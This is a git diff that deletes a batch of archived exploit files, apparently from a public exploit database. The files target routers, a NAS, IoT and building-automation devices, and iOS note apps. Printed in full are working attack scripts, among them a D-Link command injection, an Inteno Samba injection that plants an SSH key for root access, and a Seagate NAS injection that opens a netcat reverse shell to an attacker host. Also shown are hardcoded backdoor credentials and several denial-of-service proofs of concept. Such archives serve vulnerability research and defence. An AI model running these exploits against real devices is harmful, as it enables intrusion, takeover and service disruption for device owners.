diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt deleted file mode 100644 index 828ab7f44..000000000 --- a/exploits/hardware/remote/50034.txt +++ /dev/null @@ -1,109 +0,0 @@ -# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection -# Date: 17-06-2021 -# Exploit Author: Mohammed Hadi (HadiMed) -# Vendor Homepage: https://me.dlink.com/consumer -# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 -# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* -# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) - -### - -#!/bin/bash - -# Exploit by HadiMed - -# Takes advantage of the tftp server that accepts the cfg file blindly -echo -ne "\n" -echo "Exploiting Dlink DSL-2750u version 1.6" -echo -ne "\n\n" - -# Sending the payload -echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 -echo -ne "\n" - -echo "File uploaded Successfully" -echo "Waiting for router to restart" - -sleep 180 # approximate time for router to restart - -python3 exploit.py - -### - -import requests - -# HTTP request looks like this -''' -POST /cgi-bin/webproc HTTP/1.1 -Host: 192.168.1.1 -Content-Length: 175 -Cache-Control: max-age=0 -Upgrade-Insecure-Requests: 1 -Origin: http://192.168.1.1 -Content-Type: application/x-www-form-urlencoded -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 -Referer: http://192.168.1.1/cgi-bin/webproc -Accept-Encoding: gzip, deflate -Accept-Language: en-US,en;q=0.9 -Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 -Connection: close - -getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 -''' - -# 1 Getting a session id - -# password and username crafted by me on the cfg.xml file - -username = "pwned" -password= "pwned" - - -# acually the client set the sessionid in condition that the password and username are correct - -Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" -Contentty="application/x-www-form-urlencoded" -Referer="http://192.168.1.1/cgi-bin/webproc" -Contentlen="175" - -# Sending first request to set our session id -response = requests.post("http://192.168.1.1/cgi-bin/webproc", - headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } -, - data={ "getpage":"html/index.html", - "errorpage":"html/main.html", - "var:menu" : "setup", - "var:page":"wizard", - "obj-action":"auth", - ":username":username, - ":password":password, - ":action":"login", - ":sessionid":"deadbeef" -} - ) - - -Referer = "http://192.168.1.1/cgi-bin/webupg" - -name = "mac" -cmd = "1;sleep${IFS}10;reboot;" - -Contentlen = str(len(name+cmd)+10) - -if response.status_code==302: - print("got sessionid=deadbeef !\n waiting for the reverse shell ...") - -# access cgi-bin/webupg -try : - response = requests.post("http://192.168.1.1/cgi-bin/webupg", - headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } - ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 - -) - -except requests.exceptions.Timeout : - - print("done router will restart in 20 sec") - -print("Device restarted!") \ No newline at end of file diff --git a/exploits/hardware/webapps/49425.py b/exploits/hardware/webapps/49425.py deleted file mode 100755 index 01e3308ad..000000000 --- a/exploits/hardware/webapps/49425.py +++ /dev/null @@ -1,118 +0,0 @@ -# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC) -# Date: 2021-01 -# Exploit Author: Shizhi He -# Vendor Homepage: https://www.cisco.com/ -# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7 -# Version: V1.2.1.7 -# Tested on: RV110W V1.2.1.7 -# CVE : CVE-2021-1167 -# References: -# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md -# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U - -#!/usr/bin/env python2 - -##### -## Cisco RV110W Remote Stack Overflow. -### Tested on version: V1.2.1.7 (maybe useable on other products and versions) - - -import os -import sys -import re -import urllib -import urllib2 -import getopt -import json -import hashlib -import ssl - -ssl._create_default_https_context = ssl._create_unverified_context - -### -# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco -# This PoC will crash the target HTTP/HTTPS service -### - -#encrypt password -def enc(s): - l = len(s) - s += "%02d" % l - mod = l + 2 - ans = "" - for i in range(64): - tmp = i % mod - ans += s[tmp] - return hashlib.md5(ans).hexdigest() - -if __name__ == "__main__": - print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco" - - IP = sys.argv[1] - PORT = sys.argv[2] - USERNAME = sys.argv[3] - PASSWORD = enc(sys.argv[4]) - url = 'https://' + IP + ':' + PORT + '/' - - #get session_id by POST login.cgi - req = urllib2.Request(url + "login.cgi") - req.add_header('Origin', url) - req.add_header('Upgrade-Insecure-Requests', 1) - req.add_header('Content-Type', 'application/x-www-form-urlencoded') - req.add_header('User-Agent', - 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') - req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') - req.add_header('Referer', url) - req.add_header('Accept-Encoding', 'gzip, deflate') - req.add_header('Accept-Language', 'en-US,en;q=0.9') - req.add_header('Cookie', 'SessionID=') - data = {"submit_button": "login", - "submit_type": "", - "gui_action": "", - "wait_time": "0", - "change_action": "", - "enc": "1", - "user": USERNAME, - "pwd": PASSWORD, - "sel_lang": "EN" - } - r = urllib2.urlopen(req, urllib.urlencode(data)) - resp = r.read() - login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] - session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] - print session_id - - #trigger stack overflow through POST vpn_account parameter and cause denial of service - req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) - req2.add_header('Origin', url) - req2.add_header('Upgrade-Insecure-Requests', 1) - req2.add_header('Content-Type', 'application/x-www-form-urlencoded') - req2.add_header('User-Agent', - 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') - req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') - req2.add_header('Referer', url) - req2.add_header('Accept-Encoding', 'gzip, deflate') - req2.add_header('Accept-Language', 'en-US,en;q=0.9') - req2.add_header('Cookie', 'SessionID=') - poc = "a" * 4096 - data_cmd = { - "gui_action": "Apply", - "submit_type": "", - "submit_button": "vpn_client", - "change_action": "", - "pptpd_enable": "0", - "pptpd_localip": "10.0.0.1", - "pptpd_remoteip": "10.0.0.10-14", - "pptpd_account": "", - "vpn_pptpd_account": "1", - "vpn_account": poc, - "change_lan_ip": "0", - "netbios_enable": "0", - "mppe_disable": "0", - "importvpnclient": "", - "browser": "", - "webpage_end": "1", - } - r = urllib2.urlopen(req2, urllib.urlencode(data_cmd)) - resp = r.read() - print resp \ No newline at end of file diff --git a/exploits/hardware/webapps/49438.py b/exploits/hardware/webapps/49438.py deleted file mode 100755 index 9634b7434..000000000 --- a/exploits/hardware/webapps/49438.py +++ /dev/null @@ -1,188 +0,0 @@ -# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated) -# Date: 2020-03-29 -# Exploit Author: Henrik Pedersen -# Vendor Homepage: https://intenogroup.com/ -# Version: Iopsys <3.16.5 -# Fixed Version: Iopsys 3.16.5 -# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router - -# Description: -# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno’s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem. - -# Patch in release -# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt - -# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/ - -#!/usr/bin/python3 -import json -import sys -import os -import time -import argparse -from websocket import create_connection -from impacket.smbconnection import SMBConnection -from impacket.examples.smbclient import MiniImpacketShell - -""" -Root filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5 - -Usage: smbexploit.py -u -p -k - -Requires: -impacket -websocket-client - -On Windows: -pyreadline - -""" - -def ubusAuth(host, username, password): - """ - https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py - """ - ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) - req = json.dumps({ - "jsonrpc": "2.0", "method": "call", - "params": [ - "00000000000000000000000000000000","session","login", - {"username": username,"password": password} - ], - "id": 666 - }) - ws.send(req) - response = json.loads(ws.recv()) - ws.close() - try: - key = response.get('result')[1].get('ubus_rpc_session') - except IndexError: - return None - return key - -def ubusCall(host, key, namespace, argument, params={}): - """ - https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py - """ - ws = create_connection(f"ws://{host}", header = ["Sec-WebSocket-Protocol: ubus-json"]) - req = json.dumps({"jsonrpc": "2.0", "method": "call", - "params": [key,namespace,argument,params], - "id": 666}) - ws.send(req) - response = json.loads(ws.recv()) - ws.close() - try: - result = response.get('result')[1] - except IndexError: - if response.get('result')[0] == 0: - return True - return None - return result - -def auth(host, user, password): - print("Authenticating...") - key = ubusAuth(host, user, password) - if not key: - print("[-] Auth failed!") - sys.exit(1) - print(f"[+] Auth successful") - return key - -def smb_put(args): - username = "" - password = "" - - try: - smbClient = SMBConnection(args.host, args.host, sess_port=445) - smbClient.login(username, password, args.host) - - print("Reading SSH key") - try: - with open(args.key_path, "r") as fd: - sshkey = fd.read() - except IOError: - print(f"[-] Error reading {args.sshkey}") - - print("Creating temp file for authorized_keys") - try: - with open("authorized_keys", "w") as fd: - fd.write(sshkey) - path = os.path.realpath(fd.name) - except IOError: - print("[-] Error creating authorized_keys") - - shell = MiniImpacketShell(smbClient) - shell.onecmd("use pwned") - shell.onecmd("cd /etc/dropbear") - shell.onecmd(f"put {fd.name}") - - print("Cleaning up...") - os.remove(path) - except Exception as e: - print("[-] Error connecting to SMB share:") - print(str(e)) - sys.exit(1) - -def main(args): - payload = "pwned]\npath=/\nguest ok=yes\nbrowseable=yes\ncreate mask=0755\nwriteable=yes\nforce user=root\n[abc" - key = auth(args.host, args.user, args.passwd) - print("Adding Samba share...") - smbcheck = json.dumps(ubusCall(args.host, key, "uci", "get", {"config":"samba"})) - if "pwned" in smbcheck: - print("[*] Samba share seems to already exist, skipping") - else: - smba = ubusCall(args.host, key, "uci", "add", { - "config": "samba", - "type":"sambashare", - "values": { - "name": payload, - "read_only": "no", - "create_mask":"0775", - "dir_mask":"0775", - "path": "/mnt/", - "guest_ok": "yes" - } - }) - if not smba: - print("[-] Adding Samba share failed!") - sys.exit(1) - - print("Enabling Samba...") - smbe = ubusCall(args.host, key, "uci", "set", - {"config":"samba", "type":"samba", "values": - {"interface":"lan"}}) - if not smbe: - print("[-] Enabling Samba failed!") - sys.exit(1) - - print("Committing changes...") - smbc = ubusCall(args.host, key, "uci", "commit", - {"config":"samba"}) - if not smbc: - print("[-] Committing changes failed!") - sys.exit(1) - - if args.key_path: - # Allow the service to start - time.sleep(2) - smb_put(args) - print(f"[+] Exploit complete. Try \"ssh -i id_rsa root@{args.host}\"") - else: - print("[+] Exploit complete, SMB share added.") - -def parse_args(args): - """ Create the arguments """ - parser = argparse.ArgumentParser() - parser.add_argument("-u", dest="user", help="Username", default="user") - parser.add_argument("-p", dest="passwd", help="Password", default="user") - parser.add_argument("-k", dest="key_path", help="Public ssh key path") - parser.add_argument(dest="host", help="Target host") - - if len(sys.argv) < 2: - parser.print_help() - sys.exit(1) - - return parser.parse_args(args) - -if __name__ == "__main__": - main(parse_args(sys.argv[1:])) \ No newline at end of file diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt deleted file mode 100644 index 14c307200..000000000 --- a/exploits/hardware/webapps/49459.txt +++ /dev/null @@ -1,67 +0,0 @@ -# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) -# Date: 07.11.2020 -# Exploit Author: LiquidWorm -# Vendor Homepage: https://www.selea.com - -Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure - - -Vendor: Selea s.r.l. -Product web page: https://www.selea.com -Affected version: Model: iZero - Targa 512 - Targa 504 - Targa Semplice - Targa 704 TKM - Targa 805 - Targa 710 INOX - Targa 750 - Targa 704 ILB - Firmware: BLD201113005214 - BLD201106163745 - BLD200304170901 - BLD200304170514 - BLD200303143345 - BLD191118145435 - BLD191021180140 - BLD191021180140 - CPS: 4.013(201105) - 3.100(200225) - 3.005(191206) - 3.005(191112) - -Summary: IP camera with optical character recognition (OCR) software for automatic -number plate recognition (ANPR) also equipped with ADR system that enables it to read -the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number -of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number -plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes -this camera suitable for all installation conditions. Its built-in OCR software works -as an automatic and independent system without the need of a computer, thus giving -autonomy to the device even in the event of an interruption in the connection between -the camera and the operations centre. - -Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream -disclosure when p1.mjpg or p1.264 is called. - -Tested on: GNU/Linux 3.10.53 (armv7l) - PHP/5.6.22 - selea_httpd - HttpServer/0.1 - SeleaCPSHttpServer/1.1 - - -Vulnerability discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2021-5619 -Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php - - -07.11.2020 - --- - - -Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 -Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg \ No newline at end of file diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt deleted file mode 100644 index 30aea47af..000000000 --- a/exploits/hardware/webapps/49937.txt +++ /dev/null @@ -1,47 +0,0 @@ -# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) -# Date: 01/06/2021 -# Exploit Author: sirpedrotavares -# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html -# Software Link: https://www.chiyu-tech.com/category-hardware.html -# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 -# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC -# CVE: CVE-2021-31642 -# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks - -Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. -CVE ID: CVE-2021-31642 -CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H -URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 - -Affected parameter: page=Component: if.cgi -Payload: -if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 - -====HTTP request====== -GET -/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 -HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) -Gecko/20100101 Firefox/87.0 -Accept: -text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 -Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 -Accept-Encoding: gzip, deflate -Authorization: Basic YWRtaW46YWRtaW4= -Connection: close -Referer: http://127.0.0.1/AccLog.htm -Cookie: fresh= -Upgrade-Insecure-Requests: 1 - - - -Steps to reproduce: - 1. Navigate to the vulnerable device - 2. Make a GET request to the CGI component (if.cgi) - 3. Append the payload at the end of the vulnerable parameter (page) - 4. Submit the request and observe payload execution - - - Mitigation: The latest version of the CHIYU firmware should be installed -to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/hardware/webapps/50132.py b/exploits/hardware/webapps/50132.py deleted file mode 100755 index 4b2aa9629..000000000 --- a/exploits/hardware/webapps/50132.py +++ /dev/null @@ -1,29 +0,0 @@ -# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection -# Date: 15.07.2021 -# Discovered by: Jeroen - IT Nerdbox -# Exploit Author: Metin Yunus Kandemir -# Version: sg2000-2000.1331 -# Vendor Homepage: https://www.seagate.com/ -# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/ - -#!/usr/bin/python3 - -import requests -import sys - -def exec(target, ncIp, ncPort): - print("[!] Please check netcat listener: "+ ncPort) - url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00" - r = requests.get(url = url) - sys.exit(1) - -def main(args): - if len(args) != 4: - print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0])) - print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80") - sys.exit(1) - exec(target=args[1], ncIp=args[2], ncPort=args[3]) - - -if __name__ == "__main__": - main(args=sys.argv) \ No newline at end of file diff --git a/exploits/hardware/webapps/50281.txt b/exploits/hardware/webapps/50281.txt deleted file mode 100644 index d29e73c82..000000000 --- a/exploits/hardware/webapps/50281.txt +++ /dev/null @@ -1,114 +0,0 @@ -# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function -# Date: 25.06.2021 -# Exploit Author: Neurogenesia -# Vendor Homepage: http://www.ecoa.com.tw - -ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function - - -Vendor: ECOA Technologies Corp. -Product web page: http://www.ecoa.com.tw -Affected version: ECOA ECS Router Controller - ECS (FLASH) - ECOA RiskBuster Terminator - E6L45 - ECOA RiskBuster System - RB 3.0.0 - ECOA RiskBuster System - TRANE 1.0 - ECOA Graphic Control Software - ECOA SmartHome II - E9246 - ECOA RiskTerminator - -Summary: -#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are -designed to provide you with the latest in the Human Machine Interface (HMI) technology, -for completely monitoring and controlling management. It may be used singly for small and -medium sized facilities, could be linked together via the high-speed Ethernet to other -servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more -sophisticated applications. The Risk-Terminator practice Web basic conception that with -operation simply and conveniently, totally share risk and make sure of security. Even -remote sites may be controlled and monitored through Ethernet port, which base on standard -transferring protocol like XML, Modbus TCP/IP or BACnet or URL. - -#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP -networking technologies. It incorporates an embedded web server that can deliver user-specific -web pages to any PC or mobile terminal running internet browser software. A user with an -appropriate security codes can made adjustment or monitor the network control unit form -any internet access point in the world. It also provides network management, integration -and process control functions for any existing or new building controllers and microprocessor -based equipments or system in buildings. The management function provided by the RiskBuster -such as trend log and alarm generation improves building controllers and microprocessor -based equipments or system management and audit trail capabilities. The integration function -provided by the RiskBuster allows seamless integration such as information sharing (read/write) -between building controllers and microprocessor based equipments or system without any need -of major upgrade or equipments replacement and allow cost saving. The process control functions -provided by the RiskBuster allow global control action to be implemented across any building -controllers and microprocessor based equipments or system to allow full building control. The -RiskBuster provide a truly cost effective solution for any building automation or high level -integration application. A truly Ethernet network compliant feature allows the RiskBuster to -be install anywhere in the building. - -#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for -Building Automate System; Environment control system; HVAC control system and other types of -equipment. Being fully programmable it ensures complete application versatility, allowing -specific products to be created according to customer requests. This controller is a configurable -unitary controller based on the 32bit series microcomputer, with an on-board clock, have two -RS-485 local bus. - -#4 The ECS0000160 is a Router Controller for building and industry products based on various -microprocessors. It not only accessing information but also monitoring and controlling across -Internet directly. The ECS0000160 can totally replace and improve a typical system that always -has tedious panel and complex working process. An obviously benefit to our customers is that -ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed -to connect with singular specific operating system. It's like a whole package, which provides -browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all -through web-pages operating, which works base on standard transmission Internet protocol. The -ECS0000160 provides a low industry cost. A truly friendly network interface which is simple -and easy to apply on factory floors. It supports from serial ports with options of RS485. - -#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden -installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A -conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, -integral and differential (P+I+D) and dead-zone control to control accurately. The controller -features contains the sensing system, proportional control systems, computing modules, control -modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, -air monitoring, lighting and power control, the use of premises for buildings, factories, offices, -conference rooms, restaurants, hotels, etc. - -Desc: -The BAS controller has hidden backdoors in several binaries that serve the web application. Any -unauthenticated attacker can download all the resources and binaries/services that serve the controller -and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for -backdoor access with full functionality of the Smart Home, Access Control and Building Automation -System solutions. - -Tested on: EMBED/1.0 - Apache Tomcat/6.0.44 - Apache Tomcat/6.0.18 - Windows Server - MySQL Version 5.1.60 - MySQL Version 4.0.16 - Version 2.0.1.28 20180628 - - -Vulnerability discovered by Neurogenesia - @zeroscience - - -Advisory ID: ZSL-2021-5674 -Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php - - -25.06.2021 - --- - - -Backdoor Accounts / Authentication Bypass ------------------------------------------ - -- Example of backdoors revealed in httpser.elf binary: -... -... - VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor"); - if (VAR2 == (char *)0x0) { - VAR2 = strstr(ARG1,"username=amandoor&password=amandoor"); -... -... \ No newline at end of file diff --git a/exploits/ios/dos/49883.py b/exploits/ios/dos/49883.py deleted file mode 100755 index e45d5a843..000000000 --- a/exploits/ios/dos/49883.py +++ /dev/null @@ -1,23 +0,0 @@ -# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) -# Author: Luis Martinez -# Discovery Date: 2021-05-18 -# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887 -# Software Link: App Store for iOS devices -# Tested Version: 14.16.10 -# Vulnerability Type: Denial of Service (DoS) Local -# Tested on OS: iPhone 7 iOS 14.5.1 - -# Steps to Produce the Crash: -# 1.- Run python code: WebSSH_for_iOS_14.16.10.py -# 2.- Copy content to clipboard -# 3.- Open "WebSSH for iOS" -# 4.- Click -> Tools -# 5.- Click -> mashREPL -# 6.- Paste ClipBoard on "mashREPL>" -# 7.- Intro -# 8.- Crashed - -#!/usr/bin/env python - -buffer = "\x41" * 300 -print (buffer) \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py deleted file mode 100755 index 6d5296fdb..000000000 --- a/exploits/ios/dos/49952.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 -# Version: 1.4 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: -f = open("payload.txt","w") -f.write(buffer) -f.close() -print ("File created") -except: -print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py deleted file mode 100755 index 86a498847..000000000 --- a/exploits/ios/dos/49953.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 -# Version: 5.5 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py deleted file mode 100755 index 66e9c636c..000000000 --- a/exploits/ios/dos/49954.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 -# Version: 5.3 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49957.py b/exploits/ios/dos/49957.py deleted file mode 100755 index 5e8d8e573..000000000 --- a/exploits/ios/dos/49957.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) -# Date: 06-04-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 -# Version: 1.4.2 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py deleted file mode 100755 index 641bdc839..000000000 --- a/exploits/ios/dos/49978.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) -# Date: 06-07-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608 -# Version: 3.0.6 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py deleted file mode 100755 index 0fb3bf745..000000000 --- a/exploits/ios/dos/49979.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC) -# Date: 06-09-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/n-otes/id596895960 -# Version: 1.6.2 -# Category: DoS (iOS) - -##### Vulnerability ##### - -Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: - -# STEPS # -# Open the program. -# Create a new Note. -# Run the python exploit script payload.py, it will create a new payload.txt file -# Copy the content of the file "payload.txt" -# Paste the content from payload.txt twice in the new Note. -# Crashed - -Successful exploitation will cause the application to stop working. - -I have been able to test this exploit against iOS 14.2. - -##### PoC ##### ---> payload.py <-- -#!/usr/bin/env python -buffer = "\x41" * 350000 - -try: - f = open("payload.txt","w") - f.write(buffer) - f.close() - print ("File created") -except: - print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py deleted file mode 100755 index a6fee8b92..000000000 --- a/exploits/ios/dos/50001.py +++ /dev/null @@ -1,35 +0,0 @@ -# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) -# Date: 06-14-2021 -# Author: Geovanni Ruiz -# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888 -# Version: 3.0.3 